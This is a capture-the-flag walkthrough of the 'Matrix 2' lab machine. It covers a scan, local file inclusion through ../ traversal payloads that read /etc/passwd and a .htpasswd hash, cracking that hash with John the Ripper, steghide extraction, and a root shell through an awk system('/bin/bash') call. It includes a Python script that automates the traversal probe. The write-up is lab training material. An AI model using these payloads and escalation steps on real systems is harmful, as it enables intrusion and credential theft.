Secuneus Labs – TryHackMe Walk-through : THE MATRIX 2
Step 1 command = netdiscover -r 192.168.1.0/24
Use this to find all the live hosts on the local network. Here the IP of the target machine is 192.168.1.41.
Step 2 Use command = nmap -A -sV -p- 192.168.1.41 for an aggressive scan (-A for OS and script detection, -sV for service versions, -p- for all 65535 TCP ports).
Step 3 the following ports are open on the target machine.
As port 80 is open, let's check the website running there by browsing to the target's IP, i.e. http://192.168.1.41.
However, we did not find any useful information on the page itself, so let's check the page source.
Here we found a script named js/index.js. Let's check it out and see if we can find something. In it we find some lines that are not rendered in the webpage, and some strings that give us our next hint: check port 1337. There are also some odd strings such as Cr4sh coD3 that look like a username and password. Let's keep them for later use.
Step 4 let's check the service on port 1337.
But an error message is displayed saying that only HTTPS is accepted. Moreover, the nmap scan also showed an HTTPS service on port 1337, not HTTP, so let's switch to https://192.168.1.41:1337.
Now we see a login prompt, but we don't know any credentials yet, so let's try the other ports where HTTP or HTTPS services are running. On port 12320 we again find a login page. The webpage on port 12321 does not open, and port 12322 shows the main webpage.
Moreover, running dirb against all these sites does not turn up anything useful. So let's take another approach. Many websites have a robots.txt file; let's check whether any of these sites has one.
Voila... https://192.168.1.41:12322 has a robots.txt, and it even lists a disallowed file, file_view.php. So let's open it. However, opening it gives us a blank page. But in the page source we see a message about a missing parameter.
Step 5 on reading this error message carefully, we see that the file parameter is missing. A script that takes a file name as a parameter and includes it in the page is the classic setup for a local file inclusion (LFI) vulnerability: by supplying a path of our choice we can read local files on the server hosting the website. We know the target is Linux-based, so the webroot is probably /var/www/html, and the system's user accounts are listed in the file /etc/passwd (usernames, UIDs, home directories and login shells; the password hashes themselves live in /etc/shadow, which is only readable by root, so /etc/passwd and /etc/shadow together play roughly the role of the SAM database on Windows). So we can use this vulnerability to traverse out of /var/www/html with ../ sequences to reach /etc/passwd. For this we use Burp Suite, because we have to add the file parameter to the body of the request and send it as a POST request.
Here we use Repeater so that we can see the request and response side by side. We change the GET request to POST, and then use trial and error to find the exact value for the parameter. We first add a body parameter named file with the value /etc/passwd and send the request. As we get the same blank result, we change the value to ../etc/passwd and keep adding ../ until the file comes back, which happens at ../../../../../etc/passwd, where we see the result shown above.
We found one user, n30. Let's keep that in mind and proceed. Looking at the output carefully, we see that the web server is nginx (open-source web server software that is also used for reverse proxying, load balancing and caching; it serves HTTPS and is designed for performance and stability). nginx keeps the configuration of the sites it serves under /etc/nginx/sites-available/, with the default site in sites-available/default. So let's read that file through Burp Suite using parameter = file and value = ../../../../../etc/nginx/sites-available/default.
In it we see a path, /var/www/p4ss/.htpasswd, which might hold something useful. Let's read it using parameter = file and value = ../../../../../var/www/p4ss/.htpasswd. Voila.. we got a credential: Tr1n17y:$apr1$7tu4e5pd$hwluCxFYqn/IHVFcQ2wER0. This is an Apache-style htpasswd entry: the username, then an $apr1$ (MD5-crypt) hash of the password.
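The trial-and-error in Step 5 (add one more ../ and resend until /etc/passwd comes back) is easy to automate. The script below is an added example for this walkthrough, not the author's code: it posts the file parameter with 0 to N leading ../ segments, stops at the first response that contains a root:x:0:0 line, and then lists the accounts with a real login shell (which is how n30 stands out). The URL, the parameter name, the marker regex and the constructed /etc/passwd sample are assumptions; the fake_fetch function stands in for the lab server so the logic runs offline, and swapping it for the default https_post runs it against the target.

```python
"""Probe a file-inclusion parameter for the traversal depth that reaches /etc/passwd.

Added example (not from the original walkthrough). Assumptions: the target
script takes a POST parameter named `file`, includes it relative to the
webroot, and the lab uses a self-signed certificate.
"""
import re
import ssl
import urllib.parse
import urllib.request
from typing import Callable, Optional

# A successful read shows up as the root entry of /etc/passwd (name:x:uid:gid:...).
PASSWD_LINE = re.compile(r"^root:[^:]*:0:0:", re.MULTILINE)


def build_payloads(target: str, max_depth: int = 8) -> list[str]:
    """Candidate parameter values: target with 0..max_depth leading '../' segments."""
    rel = target.lstrip("/")
    return [("../" * depth) + rel for depth in range(max_depth + 1)]


def looks_like_passwd(body: str) -> bool:
    return PASSWD_LINE.search(body) is not None


def https_post(url: str, param: str, value: str) -> str:
    """Send the parameter in a POST body over HTTPS, ignoring the lab's self-signed cert."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    data = urllib.parse.urlencode({param: value}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    with urllib.request.urlopen(req, context=ctx, timeout=10) as resp:
        return resp.read().decode(errors="replace")


def find_traversal_depth(
    url: str,
    param: str = "file",
    target: str = "/etc/passwd",
    max_depth: int = 8,
    fetch: Callable[[str, str, str], str] = https_post,
) -> Optional[tuple[int, str]]:
    """Return (depth, payload) for the first payload whose response contains the file."""
    for depth, payload in enumerate(build_payloads(target, max_depth)):
        if looks_like_passwd(fetch(url, param, payload)):
            return depth, payload
    return None


def list_shell_users(passwd: str) -> list[str]:
    """Accounts with an interactive login shell; service accounts use nologin/false."""
    users = []
    for line in passwd.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and not fields[6].endswith(("nologin", "false")):
            users.append(fields[0])
    return users


# Constructed sample (not captured from the lab) so the code can run offline.
FAKE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    "n30:x:1000:1000::/home/n30:/bin/bash\n"
)


def fake_fetch(url: str, param: str, value: str) -> str:
    """Mimics the lab page: only the correct depth returns the file, otherwise a blank page."""
    if value == "../../../../../etc/passwd":
        return FAKE_PASSWD
    return "<!-- missing parameter -->"


if __name__ == "__main__":
    hit = find_traversal_depth("https://192.168.1.41:12322/file_view.php", fetch=fake_fetch)
    print("traversal depth:", hit)
    if hit:
        print("login users:", list_shell_users(fake_fetch("", "file", hit[1])))
```

Once the depth is known, the same prefix is reused for every other file (the nginx site config and the .htpasswd file that follow), so finding it once saves repeating the guessing game in Repeater.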
Step 6 now let's crack this hash with John the Ripper. Use the following commands (paste the htpasswd line into the file, save with Ctrl+O and exit nano with Ctrl+X; john recognises the $apr1$ prefix as md5crypt on its own):
touch hash1
nano hash1
Tr1n17y:$apr1$7tu4e5pd$hwluCxFYqn/IHVFcQ2wER0
Ctrl + O
Ctrl + X
john hash1 --wordlist=/usr/share/wordlists/rockyou.txt
Step 7 now let's log in to the first authentication page we found, https://192.168.1.41:1337, with the cracked credentials admin and Tr1n17y. After trying both combinations we find that Tr1n17y is the username and admin is the password.
Now we see the same webpage but with a new addition, n30, highlighted. We had already found n30 as a user in Step 5, which confirms it. We did not find anything else here, so let's check the page source.
Here we see a comment about an image, h1dd3n.jpg. Let's open it at https://192.168.1.41:1337/h1dd3n.jpg.
We see an image with some message and nothing more, so we are stuck again. After giving it some thought: a message can be hidden inside an image using steganography. What if that is the case with this image? Let's check whether our suspicion is right. First we download the image, then we use steghide to extract any hidden data with command = steghide extract -sf h1dd3n.jpg -xf matrix2.txt. Here -sf names the stego file (the image) and -xf the file the extracted data is written to.
However we are stuck again when steghide asks for a passphrase. steghide always prompts for one, and extraction fails without the right passphrase, so this does not yet tell us whether anything is embedded. Where would the passphrase come from? After some thought we remember that n30 was highlighted in red on the webpage. What if n30 is the passphrase? Let's try it.
Great, we got the hidden text. So n30 was the passphrase for h1dd3n.jpg as well as our user. Reading matrix2.txt gives us the password P4$$w0rd, which is very likely the password for user n30.
Step 8 we now have username = n30 and password = P4$$w0rd, so let's log in to the second authentication page, https://192.168.1.41:12320.
And we got access. Now we have to find the root flag, so let's run command = ls -al to see what is on the target.
We see many files and folders, but the one that interests us is .bash_history, which holds the history of commands run in this account. Let's open it with command = cat .bash_history and check the history; we might find a hint.
After opening the file, we see that the following commands have been used again and again:
id
morpheus 'BEGIN {system("/bin/bash")}'
id
cd /root
cat flag.txt
So let's try these commands. The argument to morpheus is an awk program (a BEGIN block that calls system("/bin/bash")), so morpheus is most likely an awk binary that runs with root privileges, and the history shows that right after the command = morpheus 'BEGIN {system("/bin/bash")}' the second id shows root. This looks like the approach we have to follow.
Voila... after using the morpheus command we got root access. So now all we have to do is go to /root and find the flag using the following commands:
id
cd ..
ls
cd ..
ls
cd root
ls
cat flag.txt
This CTF walkthrough created by Nishtha Kumari